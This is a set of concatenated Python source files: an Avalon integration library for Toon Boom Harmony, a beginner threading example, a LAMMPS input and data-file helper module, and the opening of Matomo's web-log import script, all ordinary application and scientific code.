SERVER.StartGame()
assert ClientInstances[-1].ConnectToServer(HOST, PORT) == -1
for client in ClientInstances[:-1]:
client.Disconnect()
|
lib.py
|
import subprocess
import threading
import os
import random
import zipfile
import sys
import importlib
import queue
import shutil
import logging
import contextlib
import json
import signal
import time
from .server import Server
from ..vendor.Qt import QtWidgets
from ..tools import workfiles
self = sys.modules[__name__]
self.server = None
self.pid = None
self.application_path = None
self.callback_queue = None
self.workfile_path = None
self.port = None
# Setup logging.
self.log = logging.getLogger(__name__)
self.log.setLevel(logging.DEBUG)
def execute_in_main_thread(func_to_call_from_main_thread):
self.callback_queue.put(func_to_call_from_main_thread)
def main_thread_listen():
callback = self.callback_queue.get()
callback()
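# execute_in_main_thread and main_thread_listen form a simple producer/consumer
# pair over callback_queue: the server thread enqueues callables and the main
# thread (inside launch) pops and runs them, so Qt tools are always created on
# the main thread.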
def launch(application_path):
"""Setup for Harmony launch.
Launches Harmony and the server, then starts listening on the main thread
for callbacks from the server. This is to have Qt applications run in the
main thread.
"""
from avalon import api, harmony
api.install(harmony)
self.port = random.randrange(5000, 6000)
os.environ["AVALON_HARMONY_PORT"] = str(self.port)
self.application_path = application_path
# Launch Harmony.
os.environ["TOONBOOM_GLOBAL_SCRIPT_LOCATION"] = os.path.dirname(__file__)
if os.environ.get("AVALON_HARMONY_WORKFILES_ON_LAUNCH", False):
workfiles.show(save=False)
# No launch through Workfiles happened.
if not self.workfile_path:
zip_file = os.path.join(os.path.dirname(__file__), "temp.zip")
launch_zip_file(zip_file)
self.callback_queue = queue.Queue()
while True:
main_thread_listen()
def get_local_harmony_path(filepath):
"""From the provided path get the equivalent local Harmony path."""
basename = os.path.splitext(os.path.basename(filepath))[0]
harmony_path = os.path.join(os.path.expanduser("~"), ".avalon", "harmony")
return os.path.join(harmony_path, basename)
def launch_zip_file(filepath):
"""Launch a Harmony application instance with the provided zip file."""
print("Localizing {}".format(filepath))
temp_path = get_local_harmony_path(filepath)
scene_path = os.path.join(
temp_path, os.path.basename(temp_path) + ".xstage"
)
unzip = False
if os.path.exists(scene_path):
# Check remote scene is newer than local.
if os.path.getmtime(scene_path) < os.path.getmtime(filepath):
shutil.rmtree(temp_path)
unzip = True
else:
unzip = True
if unzip:
with zipfile.ZipFile(filepath, "r") as zip_ref:
zip_ref.extractall(temp_path)
# Close existing scene.
if self.pid:
os.kill(self.pid, signal.SIGTERM)
# Stop server.
if self.server:
self.server.stop()
# Launch Avalon server.
self.server = Server(self.port)
thread = threading.Thread(target=self.server.start)
thread.daemon = True
thread.start()
# Save workfile path for later.
self.workfile_path = filepath
print("Launching {}".format(scene_path))
process = subprocess.Popen([self.application_path, scene_path])
self.pid = process.pid
def on_file_changed(path, threaded=True):
"""Threaded zipping and move of the project directory.
This method is called when the `.xstage` file is changed.
"""
self.log.debug("File changed: " + path)
if self.workfile_path is None:
return
if threaded:
thread = threading.Thread(
target=zip_and_move,
args=(os.path.dirname(path), self.workfile_path)
)
thread.start()
else:
zip_and_move(os.path.dirname(path), self.workfile_path)
def zip_and_move(source, destination):
"""Zip a directory and move to `destination`
Args:
- source (str): Directory to zip and move to destination.
- destination (str): Destination file path to zip file.
"""
os.chdir(os.path.dirname(source))
shutil.make_archive(os.path.basename(source), "zip", source)
shutil.move(os.path.basename(source) + ".zip", destination)
self.log.debug("Saved \"{}\" to \"{}\"".format(source, destination))
def show(module_name):
"""Call show on "module_name".
This allows creating a QApplication ahead of time and always calling "exec_" to
prevent crashing.
Args:
module_name (str): Name of module to call "show" on.
"""
# Requests often get doubled up when showing tools, so we wait a second for
# requests to be received properly.
time.sleep(1)
# Need to have an existing QApplication.
app = QtWidgets.QApplication.instance()
if not app:
app = QtWidgets.QApplication(sys.argv)
# Import and show tool.
module = importlib.import_module(module_name)
if "loader" in module_name:
module.show(use_context=True)
else:
module.show()
# QApplication needs to always execute.
if "publish" in module_name:
return
app.exec_()
def get_scene_data():
func = """function func(args)
{
var metadata = scene.metadata("avalon");
if (metadata){
return JSON.parse(metadata.value);
}else {
return {};
}
}
func
"""
try:
return self.send({"function": func})["result"]
except json.decoder.JSONDecodeError:
# Means no scene metadata has been created before.
return {}
except KeyError:
# Means no existing scene metadata has been created.
return {}
def set_scene_data(data):
# Write scene data.
func = """function func(args)
{
scene.setMetadata({
"name" : "avalon",
"type" : "string",
"creator" : "Avalon",
"version" : "1.0",
"value" : JSON.stringify(args[0])
});
}
func
"""
self.send({"function": func, "args": [data]})
def read(node_id):
"""Read object metadata in to a dictionary.
Args:
node_id (str): Path to node or id of object.
Returns:
dict
"""
scene_data = get_scene_data()
if node_id in get_scene_data():
return scene_data[node_id]
return {}
def remove(node_id):
data = get_scene_data()
del data[node_id]
set_scene_data(data)
def imprint(node_id, data, remove=False):
"""Write `data` to the `node` as json.
Arguments:
node_id (str): Path to node or id of object.
data (dict): Dictionary of key/value pairs.
remove (bool): Removes the data from the scene.
Example:
>>> from avalon.harmony import lib
>>> node = "Top/Display"
>>> data = {"str": "something", "int": 1, "float": 0.32, "bool": True}
>>> lib.imprint(node, data)
"""
scene_data = get_scene_data()
if node_id in scene_data:
scene_data[node_id].update(data)
else:
scene_data[node_id] = data
set_scene_data(scene_data)
@contextlib.contextmanager
def maintained_selection():
"""Maintain selection during context."""
func = """function get_selection_nodes()
{
var selection_length = selection.numberOfNodesSelected();
var selected_nodes = [];
for (var i = 0 ; i < selection_length; i++)
{
selected_nodes.push(selection.selectedNode(i));
}
return selected_nodes
}
get_selection_nodes
"""
selected_nodes = self.send({"function": func})["result"]
func = """function select_nodes(node_paths)
{
selection.clearSelection();
for (var i = 0 ; i < node_paths.length; i++)
{
selection.addNodeToSelection(node_paths[i]);
}
}
select_nodes
"""
try:
yield selected_nodes
finally:
selected_nodes = self.send(
{"function": func, "args": selected_nodes}
)
def send(request):
"""Public method for sending requests to Harmony."""
return self.server.send(request)
@contextlib.contextmanager
def maintained_nodes_state(nodes):
"""Maintain nodes states during context."""
# Collect current state.
states = []
for node in nodes:
states.append(
self.send(
{"function": "node.getEnable", "args": [node]}
)["result"]
)
# Disable all nodes.
func = """function func(nodes)
{
for (var i = 0 ; i < nodes.length; i++)
{
node.setEnable(nodes[i], false);
}
}
func
"""
self.send({"function": func, "args": [nodes]})
# Restore state after yield.
func = """function func(args)
{
var nodes = args[0];
var states = args[1];
for (var i = 0 ; i < nodes.length; i++)
{
node.setEnable(nodes[i], states[i]);
}
}
func
"""
try:
yield
finally:
self.send({"function": func, "args": [nodes, states]})
def save_scene():
"""Saves the Harmony scene safely.
The built-in (to Avalon) background zip and moving of the Harmony scene
folder, interferes with server/client communication by sending two requests
at the same time. This only happens when sending "scene.saveAll()". This
method prevents this double request and safely saves the scene.
"""
# Need to turn off the background watcher, else the communication with
# the server gets spammed with two requests at the same time.
func = """function func()
{
var app = QCoreApplication.instance();
app.avalon_on_file_changed = false;
scene.saveAll();
return (
scene.currentProjectPath() + "/" +
scene.currentVersionName() + ".xstage"
);
}
func
"""
scene_path = self.send({"function": func})["result"]
# Manually update the remote file.
self.on_file_changed(scene_path, threaded=False)
# Re-enable the background watcher.
func = """function func()
{
var app = QCoreApplication.instance();
app.avalon_on_file_changed = true;
}
func
"""
self.send({"function": func})
def save_scene_as(filepath):
"""Save Harmony scene as `filepath`."""
scene_dir = os.path.dirname(filepath)
destination = os.path.join(
os.path.dirname(self.workfile_path),
os.path.splitext(os.path.basename(filepath))[0] + ".zip"
)
if os.path.exists(scene_dir):
shutil.rmtree(scene_dir)
send(
{"function": "scene.saveAs", "args": [scene_dir]}
)["result"]
zip_and_move(scene_dir, destination)
self.workfile_path = destination
func = """function add_path(path)
{
var app = QCoreApplication.instance();
app.watcher.addPath(path);
}
add_path
"""
send(
{"function": func, "args": [filepath]}
)
def find_node_by_name(name, node_type):
nodes = send(
{"function": "node.getNodes", "args": [[node_type]]}
)["result"]
for node in nodes:
node_name = node.split("/")[-1]
if name == node_name:
return node
return None
|
duoxiancheng01.py
|
# Process: the resource unit; every process has at least one thread
# Thread: the execution unit
from threading import Thread
def func(name):
for i in range(1000):
print('func', name)
def sum():
for i in range(1000):
print('sum', i)
# Second approach: subclass Thread
class MyThead(Thread):
def run(self): # fixed method name (invoked by start())
for i in range(1000):
print('child thread', i)
if __name__ == "__main__":
# First approach: create a thread
t = Thread(target=func, args=("周杰伦", )) # args must be passed as a tuple
t.start()
#
# t2 = Thread(target=sum)
# t2.start()
#
# Second approach
# myTh = MyThead()
# myTh.start()
for i in range(1000):
print('main', i)
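# A small sketch extending the lesson above (not part of the original example):
# t.join() makes the main thread wait until the worker thread has finished, so
# the 'main' loop would only start after 'func' is done.
#
# t = Thread(target=func, args=("周杰伦", ))
# t.start()
# t.join()  # block until the child thread finishes
# print('main continues after the worker thread is done')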
|
lmp.py
|
"""
Functions for manipulating LAMMPS files.
"""
import math
import os
from subprocess import Popen, PIPE # call,
from time import strftime
from .hublib import check_nanohub
LAMMPS_EXEC = os.environ.get("LAMMPS_EXEC")
if LAMMPS_EXEC is None:
LOADEDMODULES = os.environ.get("LOADEDMODULES")
if LOADEDMODULES and ("lammps/31Mar17" in LOADEDMODULES):
LAMMPS_EXEC = "lmp"
elif os.environ["HOME"] == "/Users/shentongtong":
LAMMPS_EXEC = "/Users/shentongtong/Dropbox/softwares/lammps-3Mar20/src/lmp_mpi"
verbose = False
def check_lmps_exec():
"""Check lammps executable exists"""
if LAMMPS_EXEC is None:
print("you must set environment variable LAMMPS_EXEC")
return False
else:
try:
stdout, stderr = Popen(
[LAMMPS_EXEC, "-e", "both", "-l", "none"],
stdin=PIPE,
stdout=PIPE,
stderr=PIPE,
).communicate()
if verbose:
print("using %s LAMMPS machine" % LAMMPS_EXEC)
return True
except OSError:
print("LAMMPS is not configured properly for one reason or another")
return False
def read_data(data_file):
"""Read information from a LAMMPS data file
Parameters
----------
data_file : str
The path of the data file to read
Returns
-------
data_dir : dict
Data from the LAMMPS data file as a dictionary.
"""
# This function would be easier to unit test if it took in a string instead of a file.
data_dir = {}
# box = {}
# masses = {}
with open(data_file, "r") as data_src:
skip_line = 1
feature = ""
for line in data_src.readlines():
if skip_line:
skip_line = 0
continue
# ln will have 0 length if line is comment.
ln = line.split("#")[0].split()
if ln:
if (
len(ln) > 1
and ln[0].isdigit()
and (not ln[1].isdigit())
and (not feature)
):
# I think you are just trying to cast as a number here? It is safer to try casting as float.
data_dir[" ".join(ln[1:])] = float(ln[0])
if len(ln) == 4 and ln[2][1:] == "lo" and ln[3][1:] == "hi":
data_dir[ln[2]] = float(ln[0])
data_dir[ln[3]] = float(ln[1])
if not (ln[0][0].isdigit() or ln[0][0] == "-"):
feature = " ".join(ln)
data_dir[feature] = {}
if feature and (ln[0][0].isdigit() or ln[0][0] == "-"):
data_dir[feature][eval(ln[0])] = [eval(i) for i in ln[1:]]
return data_dir
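# A minimal sketch of using read_data (the data file name is hypothetical).
# Header counts, box bounds and sections such as "Masses" or "Atoms" all end up
# as keys of the returned dictionary.
#
#   data = read_data("polymer.data")
#   n_atoms = data["atoms"]              # from the "N atoms" header line
#   box_x = data["xhi"] - data["xlo"]    # box length along x
#   masses = data["Masses"]              # {type_id: [mass], ...}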
def write_lmp_ifile(
lmp_file_location="LAMMPSinputfile.txt",
ffield="Dreiding",
potential_headfile="",
datafile="",
potentialfile="",
lammps_min=False,
lammps_min_levels=1,
):
"""Write a LAMMPS input file given a file location and datafile.
Parameters
----------
lmp_file_location : str (optional)
The path of LAMMPS input file to output.
ffield : str (optional)
Force field style to generate potential style definitions for LAMMPS input file.
potential_headfile : str (optional)
The path of part of the LAMMPS input file including potential style definitions.
datafile : str (optional)
The path of the LAMMPS data file to read.
potentialfile : str (optional)
The path of part of the LAMMPS input file including potential coefficients.
Returns
-------
None
"""
des = open(lmp_file_location, "w")
# des.write("newton on\n")
des.write("boundary p p p\n")
des.write("units real\n")
des.write("\n")
des.write("atom_style full\n")
des.write("dielectric 1.0\n")
if potential_headfile:
des.write("include %s\n" % potential_headfile)
else:
if ffield == "Dreiding":
des.write("special_bonds lj/coul 0.0 0.0 1.0 dihedral yes\n")
des.write("pair_style lj/cut 12.0\n")
des.write("bond_style harmonic\n")
des.write("angle_style harmonic\n")
des.write("dihedral_style harmonic\n")
des.write("improper_style harmonic\n")
elif ffield == "PCFF":
des.write("pair_style lj/class2/coul/long 9.5 9.5\n")
des.write("pair_modify tail yes \n")
des.write("bond_style class2\n")
des.write("angle_style class2\n")
des.write("dihedral_style class2\n")
des.write("improper_style class2\n")
des.write("kspace_style ewald 0.0001\n")
des.write("\n")
else:
raise Exception(
"Unknown force field style to generate potential style definitions for LAMMPS input file.\nPlease \
include a file for LAMMPS potential style definitions and set the path to potential_headfile \
parameter"
)
if datafile:
des.write("read_data %s\n" % datafile)
des.write("neighbor 0.3 bin\n")
des.write(
"thermo_style custom step etotal ke temp pe ebond eangle edihed eimp evdwl ecoul elong press pxx pyy pzz"
+ " pxy pxz pyz lx ly lz vol density\n"
)
des.write("thermo 10\n")
des.write("thermo_modify flush yes\n")
des.write("\n")
if ffield == "Dreiding":
des.write("pair_style buck/coul/long 12.0 12.0\n")
des.write("kspace_style pppm 1e-4\n")
if potentialfile:
des.write("include %s\n" % potentialfile)
des.write("\n")
des.write("fix 1 all nve\n")
des.write("run 0\n")
des.write("unfix 1\n")
des.write("\n")
des.write("# Dump minimized system\n")
des.write("dump 1 all atom 1 min.dump\n")
des.write("dump_modify 1 image yes scale no\n")
des.write("\n")
des.write("# Minimization parameters\n")
des.write("minimize 1.0e-9 1.0e-9 5000 100000\n")
des.write("\n")
des.write("undump 1\n")
des.write("write_data min.data\n")
des.write("\n")
des.write("# MD parameters\n")
des.write("run_style respa 3 2 2 bond 1 pair 2 kspace 3\n")
des.write("reset_timestep 0\n")
des.write("timestep 4\n")
des.write("dump 1 all atom 100 md.dump\n")
des.write("dump_modify 1 image yes scale no\n")
des.write("fix 1 all nvt temp 300.0 300.0 400.0\n")
des.write("run 1000\n")
des.write("write_restart restart.lammps\n")
des.write("write_data md.data\n")
des.write("\n")
# des.write("compute graincm all com\n")
# des.write("variable M equal mass(all)\n")
# des.write("variable maxcx equal bound(all,xmax)\n")
# des.write("variable mincx equal bound(all,xmin)\n")
# des.write("variable maxcy equal bound(all,ymax)\n")
# des.write("variable mincy equal bound(all,ymin)\n")
# des.write("variable maxcz equal bound(all,zmax)\n")
# des.write("variable mincz equal bound(all,zmin)\n")
# des.write("\n")
# des.write(
# "fix 1 all ave/time 1 1 1 c_graincm[1] c_graincm[2] c_graincm[3] v_maxcx v_mincx v_maxcy v_mincy
# v_maxcz v_mincz v_M file tmp.out\n"
# )
# Here is the tmp.out output after running LAMMPS
# des.write("run 0\n")
# des.write("\n")
des.close()
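# A minimal usage sketch for write_lmp_ifile (file names are hypothetical):
# write a Dreiding-style input script that reads an existing data file and
# includes a coefficient file, ready to be passed to run_lammps below.
#
#   write_lmp_ifile(
#       lmp_file_location="in.polymer",
#       ffield="Dreiding",
#       datafile="polymer.data",
#       potentialfile="potential.coeffs",
#   )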
def call_lammps(lmp_input, np, nanohub=None, prefix="mpiexec", print_to_screen=False):
"""pysimm.lmps.call_lammps
Wrapper to call LAMMPS using executable name defined in pysimm.lmps module.
Args:
lmp_input: path to the LAMMPS input file to run
np: number of MPI processes to launch (serial run if not set)
nanohub: dictionary containing nanohub resource information default=None
prefix: prefix for running LAMMPS (i.e. - mpiexec)
print_to_screen: True to print LAMMPS stdout/stderr after the run finishes
Returns:
return code from the LAMMPS run (0 on success, non-zero otherwise)
"""
# log_name = "out"
if nanohub:
# with open('temp.in', 'w') as f:
# f.write(simulation.input)
# if simulation.name:
# print('%s: sending %s simulation to computer cluster at nanoHUB' % (strftime('%H:%M:%S'), \
# simulation.name))
# else:
# print('%s: sending simulation to computer cluster at nanoHUB' % strftime('%H:%M:%S'))
# sys.stdout.flush()
# cmd = ('submit -n %s -w %s -i temp.lmps -i temp.in '
# 'lammps-09Dec14-parallel -e both -l none -i temp.in'
# % (nanohub.get('cores'), nanohub.get('walltime')))
# cmd = shlex.split(cmd)
# exit_status, stdo, stde = RapptureExec(cmd)
return_code = os.system("lmp_serial < %s > out" % lmp_input)
return return_code
else:
# if simulation.name:
# print('%s: starting %s LAMMPS simulation'
# % (strftime('%H:%M:%S'), simulation.name))
# else:
# print('%s: starting LAMMPS simulation'
# % strftime('%H:%M:%S'))
print("%s: starting LAMMPS simulation" % strftime("%H:%M:%S"))
if np:
p = Popen(
[prefix, "-np", str(np), LAMMPS_EXEC, "-e", "both"],
stdin=PIPE,
stdout=PIPE,
stderr=PIPE,
)
else:
p = Popen([LAMMPS_EXEC, "-e", "both"], stdin=PIPE, stdout=PIPE, stderr=PIPE)
# simulation.write_input()
# if simulation.debug:
# print(simulation.input)
# warning_print('debug setting involves streaming output from LAMMPS process and can degrade performance')
# warning_print('only use debug for debugging purposes, use print_to_screen to collect stdout after \
# process finishes')
# p.stdin.write(simulation.input)
# q = Queue()
# t = Thread(target=enqueue_output, args=(p.stdout, q))
# t.daemon = True
# t.start()
# while t.isAlive() or not q.empty():
# try:
# line = q.get_nowait()
# except Empty:
# pass
# else:
# if simulation.debug:
# sys.stdout.write(line)
# sys.stdout.flush()
# else:
simulation_input = ""
with open(lmp_input, "r") as input_text:
simulation_input = input_text.read()
stdo, stde = p.communicate(simulation_input.encode("utf-8"))
if print_to_screen:
print(stdo)
print(stde)
if stde:
return 1
else:
return 0
# simulation.system.read_lammps_dump('pysimm.dump.tmp')
# try:
# os.remove('temp.lmps')
# except OSError as e:
# print(str(e))
# if os.path.isfile('pysimm.qeq.tmp'):
# os.remove('pysimm.qeq.tmp')
# try:
# os.remove('pysimm.dump.tmp')
# if simulation.name:
# print('%s: %s simulation using LAMMPS successful'
# % (strftime('%H:%M:%S'), simulation.name))
# else:
# print('%s: simulation using LAMMPS successful'
# % (strftime('%H:%M:%S')))
# except OSError as e:
# if simulation.name:
# raise PysimmError('%s simulation using LAMMPS UNsuccessful' % simulation.name)
# else:
# raise PysimmError('simulation using LAMMPS UNsuccessful')
def run_lammps(lmp_input, np=None, nanohub=None, save_input=True, prefix="mpiexec"):
"""pysimm.lmps.Simulation.run
Begin LAMMPS simulation.
Args:
lmp_input: path to the LAMMPS input file to run
np: number of MPI processes to use (serial by default) default=None
nanohub: dictionary containing nanohub resource information default=None
save_input: True to save input as pysimm.sim.in
prefix: prefix for running LAMMPS (i.e. - mpiexec)
"""
try:
return_code = call_lammps(lmp_input, np, nanohub=check_nanohub(), prefix=prefix)
except OSError:
raise Exception("There was a problem calling LAMMPS with {}".format(prefix))
except: # noqa: E722
if check_lmps_exec():
raise Exception(
"There was a problem running LAMMPS. The process started but did not finish successfully. Check the \
log file, or rerun the simulation with debug=True to debug issue from LAMMPS output"
)
else:
raise Exception(
"There was a problem running LAMMPS. LAMMPS is not configured properly. Make sure the LAMMPS_EXEC \
environment variable is set to the correct LAMMPS executable path. The current path is set \
to:\n\n{}".format(
LAMMPS_EXEC
)
)
# os.system('%s < %s' % (lmp_location, lmp_file_location))
# os.system('cp log.lammps out')
# return_code = os.system('lmp_serial < ./bonds/bondcreate.in > out')
return return_code
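# Sketch of chaining the helpers above (file names are hypothetical):
#
#   write_lmp_ifile(lmp_file_location="in.polymer", datafile="polymer.data")
#   rc = run_lammps("in.polymer", np=4, prefix="mpiexec")
#   if rc != 0:
#       print("LAMMPS run reported a problem; check the log/output files")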
def read_cell_sizes(data_file):
"""read_cell_sizes function provides a quick step to read the simulation box information"""
cell_sizes = {}
delta_cell = {}
with open(data_file) as f:
for line in f:
if line.endswith("xhi\n"):
values = line.rstrip().split()
lo = values[0]
hi = values[1]
ds = float(hi) - float(lo)
cell_sizes["x"] = [lo, hi, ds]
delta_cell["x"] = ds
elif line.endswith("yhi\n"):
values = line.rstrip().split()
lo = values[0]
hi = values[1]
ds = float(hi) - float(lo)
cell_sizes["y"] = [lo, hi, ds]
delta_cell["y"] = ds
elif line.endswith("zhi\n"):
values = line.rstrip().split()
lo = values[0]
hi = values[1]
ds = float(hi) - float(lo)
cell_sizes["z"] = [lo, hi, ds]
delta_cell["z"] = ds
break
return cell_sizes, delta_cell
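# Minimal sketch for read_cell_sizes (data file name is hypothetical): each
# entry of the first dictionary is [lo, hi, length], with lo/hi kept as the
# strings read from the file and length as a float.
#
#   cell, delta = read_cell_sizes("polymer.data")
#   lx = delta["x"]                        # box length along x
#   xlo, xhi = cell["x"][0], cell["x"][1]  # box bounds as strings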
def get_boundaries(direction):
"""
get_boundaries gets the center of mass and the boundaries - the minimum and maximum x, y and z positions -
of a molecule or molecules from the LAMMPS output file tmp.out.
"""
boundaries = {}
com = {}
with open("tmp.out", "r") as infile:
r = infile.readline()
r = infile.readline() # noqa: F841
for line in infile:
print(line)
line = [float(x) for x in line.split()]
mass = line[10]
com["x"] = line[1]
com["y"] = line[2]
com["z"] = line[3]
boundaries["x"] = [line[4], line[5]]
boundaries["y"] = [line[6], line[7]]
boundaries["z"] = [line[8], line[9]]
# Get max radius
distance = []
coord = {}
# polymod = {}
for key, values in sorted(boundaries.items()):
if key == direction:
continue
res = sum(values) / 2.0
coord[key] = res
diff = abs(values[0] - res)
distance.append(diff)
# for v in values:
# distance.append(abs(v-com[key]))
radius = math.ceil(max(distance)) + 5
# print('Coordinates cylinder: ', coord, 'Radius distance :', radius)
return mass, com, boundaries, coord, radius
def write_data(data_dir, ofile, velocities=True, atom_only=False):
"""Write a LAMMPS data file
Parameters
----------
data_dir : dict
Dictionary storing data to form the LAMMPS data file.
ofile : str
The path of the LAMMPS data file to output.
velocities : bool (optional)
Whether to output the velocities section.
atom_only : bool (optional)
Whether to output atom-related sections only.
Returns
-------
None
"""
des = open(ofile, "w")
des.write("LAMMPS data file via Tongtong\n")
des.write("\n")
if atom_only:
head_list = ["atom"]
main_list = ["Masses", "Atoms", "Velocities"]
else:
head_list = ["atom", "bond", "angle", "dihedral", "improper"]
main_list = [
"Masses",
"Pair Coeffs",
"Bond Coeffs",
"Angle Coeffs",
"Dihedral Coeffs",
"Improper Coeffs",
"Atoms",
"Velocities",
"Bonds",
"Angles",
"Dihedrals",
"Impropers",
]
for head in head_list:
if (head + "s") in data_dir:
des.write("%d %s\n" % (data_dir[head + "s"], (head + "s")))
des.write("%d %s\n" % (data_dir[head + " types"], (head + " types")))
des.write("\n")
for xyz in ["x", "y", "z"]:
des.write(
"%f %f %s %s\n"
% (data_dir[xyz + "lo"], data_dir[xyz + "hi"], (xyz + "lo"), (xyz + "hi"))
)
des.write("\n")
if not velocities:
main_list.remove("Velocities")
for key in main_list:
if key in data_dir and len(data_dir[key]):
des.write(key + (" # full\n" if key == "Atoms" else "\n"))
des.write("\n")
for i in data_dir[key]:
des.write(
str(i) + " " + " ".join(str(j) for j in data_dir[key][i]) + "\n"
)
des.write("\n")
des.close()
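# Round-trip sketch (file names are hypothetical): read an existing data file
# with read_data above, then write it back without the Velocities section.
#
#   data = read_data("md.data")
#   write_data(data, "md_no_velocities.data", velocities=False)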
|
import_logs.py
|
#!/usr/bin/python
# vim: et sw=4 ts=4:
# -*- coding: utf-8 -*-
#
# Matomo - free/libre analytics platform
#
# @link https://matomo.org
# @license https://www.gnu.org/licenses/gpl-3.0.html GPL v3 or later
# @version $Id$
#
# For more info see: https://matomo.org/log-analytics/ and https://matomo.org/docs/log-analytics-tool-how-to/
#
# Requires Python 2.6 or 2.7
#
import sys
if sys.version_info[0] != 2:
print('The log importer currently does not work with Python 3 (or higher)')
print('Please use Python 2.6 or 2.7')
sys.exit(1)
import base64
import bz2
import ConfigParser
import datetime
import fnmatch
import gzip
import hashlib
import httplib
import inspect
import itertools
import logging
import optparse
import os
import os.path
import Queue
import re
import ssl
import sys
import threading
import time
import urllib
import urllib2
import urlparse
import subprocess
import functools
import traceback
import socket
import textwrap
try:
import json
except ImportError:
try:
import simplejson as json
except ImportError:
if sys.version_info < (2, 6):
print >> sys.stderr, 'simplejson (http://pypi.python.org/pypi/simplejson/) is required.'
sys.exit(1)
##
## Constants.
##
STATIC_EXTENSIONS = set((
'gif jpg jpeg png bmp ico svg svgz ttf otf eot woff woff2 class swf css js xml robots.txt webp'
).split())
DOWNLOAD_EXTENSIONS = set((
'7z aac arc arj asf asx avi bin csv deb dmg doc docx exe flac flv gz gzip hqx '
'ibooks jar json mpg mp2 mp3 mp4 mpeg mov movie msi msp odb odf odg odp '
'ods odt ogg ogv pdf phps ppt pptx qt qtm ra ram rar rpm rtf sea sit tar tbz '
'bz2 tbz tgz torrent txt wav webm wma wmv wpd xls xlsx xml xsd z zip '
'azw3 epub mobi apk'
).split())
# A good source is: http://phpbb-bots.blogspot.com/
# user agents must be lowercase
EXCLUDED_USER_AGENTS = (
'adsbot-google',
'ask jeeves',
'baidubot',
'bot-',
'bot/',
'ccooter/',
'crawl',
'curl',
'echoping',
'exabot',
'feed',
'googlebot',
'ia_archiver',
'java/',
'libwww',
'mediapartners-google',
'msnbot',
'netcraftsurvey',
'panopta',
'pingdom.com_bot_',
'robot',
'spider',
'surveybot',
'twiceler',
'voilabot',
'yahoo',
'yandex',
)
MATOMO_DEFAULT_MAX_ATTEMPTS = 3
MATOMO_DEFAULT_DELAY_AFTER_FAILURE = 10
DEFAULT_SOCKET_TIMEOUT = 300
MATOMO_EXPECTED_IMAGE = base64.b64decode(
'R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw=='
)
##
## Formats.
##
class BaseFormatException(Exception): pass
class BaseFormat(object):
def __init__(self, name):
self.name = name
self.regex = None
self.date_format = '%d/%b/%Y:%H:%M:%S'
def check_format(self, file):
line = file.readline()
try:
file.seek(0)
except IOError:
pass
return self.check_format_line(line)
def check_format_line(self, line):
return False
class JsonFormat(BaseFormat):
def __init__(self, name):
super(JsonFormat, self).__init__(name)
self.json = None
self.date_format = '%Y-%m-%dT%H:%M:%S'
def check_format_line(self, line):
try:
self.json = json.loads(line)
return True
except:
return False
def match(self, line):
try:
# nginx outputs malformed JSON w/ hex escapes when confronted w/ non-UTF input. we have to
# workaround this by converting hex escapes in strings to unicode escapes. the conversion is naive,
# so it does not take into account the string's actual encoding (which we don't have access to).
line = line.replace('\\x', '\\u00')
self.json = json.loads(line)
return self
except:
self.json = None
return None
def get(self, key):
# Some ugly patches ...
if key == 'generation_time_milli':
self.json[key] = int(float(self.json[key]) * 1000)
# Patch date format ISO 8601
elif key == 'date':
tz = self.json[key][19:]
self.json['timezone'] = tz.replace(':', '')
self.json[key] = self.json[key][:19]
try:
return self.json[key]
except KeyError:
raise BaseFormatException()
def get_all(self,):
return self.json
def remove_ignored_groups(self, groups):
for group in groups:
del self.json[group]
class RegexFormat(BaseFormat):
def __init__(self, name, regex, date_format=None):
super(RegexFormat, self).__init__(name)
if regex is not None:
self.regex = re.compile(regex)
if date_format is not None:
self.date_format = date_format
self.matched = None
def check_format_line(self, line):
return self.match(line)
def match(self,line):
if not self.regex:
return None
match_result = self.regex.match(line)
if match_result:
self.matched = match_result.groupdict()
else:
self.matched = None
return match_result
def get(self, key):
try:
return self.matched[key]
except KeyError:
raise BaseFormatException("Cannot find group '%s'." % key)
def get_all(self,):
return self.matched
def remove_ignored_groups(self, groups):
for group in groups:
del self.matched[group]
class W3cExtendedFormat(RegexFormat):
FIELDS_LINE_PREFIX = '#Fields: '
fields = {
'date': '(?P<date>\d+[-\d+]+',
'time': '[\d+:]+)[.\d]*?', # TODO should not assume date & time will be together not sure how to fix ATM.
'cs-uri-stem': '(?P<path>/\S*)',
'cs-uri-query': '(?P<query_string>\S*)',
'c-ip': '"?(?P<ip>[\w*.:-]*)"?',
'cs(User-Agent)': '(?P<user_agent>".*?"|\S*)',
'cs(Referer)': '(?P<referrer>\S+)',
'sc-status': '(?P<status>\d+)',
'sc-bytes': '(?P<length>\S+)',
'cs-host': '(?P<host>\S+)',
'cs-method': '(?P<method>\S+)',
'cs-username': '(?P<userid>\S+)',
'time-taken': '(?P<generation_time_secs>[.\d]+)'
}
def __init__(self):
super(W3cExtendedFormat, self).__init__('w3c_extended', None, '%Y-%m-%d %H:%M:%S')
def check_format(self, file):
self.create_regex(file)
# if we couldn't create a regex, this file does not follow the W3C extended log file format
if not self.regex:
try:
file.seek(0)
except IOError:
pass
return
first_line = file.readline()
try:
file.seek(0)
except IOError:
pass
return self.check_format_line(first_line)
def create_regex(self, file):
fields_line = None
if config.options.w3c_fields:
fields_line = config.options.w3c_fields
# collect all header lines up until the Fields: line
# if we're reading from stdin, we can't seek, so don't read any more than the Fields line
header_lines = []
while fields_line is None:
line = file.readline().strip()
if not line:
continue
if not line.startswith('#'):
break
if line.startswith(W3cExtendedFormat.FIELDS_LINE_PREFIX):
fields_line = line
else:
header_lines.append(line)
if not fields_line:
return
# store the header lines for a later check for IIS
self.header_lines = header_lines
# Parse the 'Fields: ' line to create the regex to use
full_regex = []
expected_fields = type(self).fields.copy() # turn custom field mapping into field => regex mapping
# if the --w3c-time-taken-millisecs option is used, make sure the time-taken field is interpreted as milliseconds
if config.options.w3c_time_taken_in_millisecs:
expected_fields['time-taken'] = '(?P<generation_time_milli>[\d.]+)'
for mapped_field_name, field_name in config.options.custom_w3c_fields.iteritems():
expected_fields[mapped_field_name] = expected_fields[field_name]
del expected_fields[field_name]
# add custom field regexes supplied through --w3c-field-regex option
for field_name, field_regex in config.options.w3c_field_regexes.iteritems():
expected_fields[field_name] = field_regex
# Skip the 'Fields: ' prefix.
fields_line = fields_line[9:].strip()
for field in re.split('\s+', fields_line):
try:
regex = expected_fields[field]
except KeyError:
regex = '(?:".*?"|\S+)'
full_regex.append(regex)
full_regex = '\s+'.join(full_regex)
logging.debug("Based on 'Fields:' line, computed regex to be %s", full_regex)
